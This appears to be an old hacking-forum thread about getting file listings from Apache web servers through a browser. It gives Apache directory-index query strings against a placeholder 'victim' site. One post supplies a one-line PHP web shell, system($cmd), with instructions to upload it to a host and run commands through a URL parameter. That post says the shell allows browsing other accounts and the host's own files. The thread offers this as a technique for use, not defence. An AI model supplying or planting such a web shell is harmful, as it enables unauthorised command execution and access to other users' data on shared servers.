:confused:
Is it possible to get the file listing of any directory on an apache-based web server ?
I mean is it possible to get the equivalent of ls using only a browser ?
Printable View
:confused:
Is it possible to get the file listing of any directory on an apache-based web server ?
I mean is it possible to get the equivalent of ls using only a browser ?
yes and no only if the server hasnt been configured properly if the short of it is if their isnt a index file its posible but u can turn the option of virtual listings off but it depends on the webmaster hehe and limp1058 aint to good at it lmao sorry had to do it
RiOtEr
http://www.victim.com/?C=N&O=D
Sort Files By Name
http://www.victim.com/?C=M&O=A
Sort Files By Last Modified
http://www.victim.com/?C=S&O=A
Sort Files By Size
http://www.victim.com/?C=D&O=A
Sort Files By Description
As RiOtEr said, this only works if the server has been configured improperly... But you wouldnt believe how many servers have this bug unpatched :)
Ok thx guys. I gonna test it right now
Script Kiddie(ing) is the easiest way perhaps...
If the server allows php to be used, put the below code in a file named asa.php and upload it.
Once uploaded, you may do almost anything on the server, including -but not limitet to- browsing other accounts on the host, and the host's own files;
go to the url http://somesite.co/asa.php?cmd=lsPHP Code:<?php
system($cmd);
?>
You will see the ls output in the screen...
:hiphop: :smokes:
Well, the servers I tested were patched... :( At least, my web site is protected against this vulnerability... :p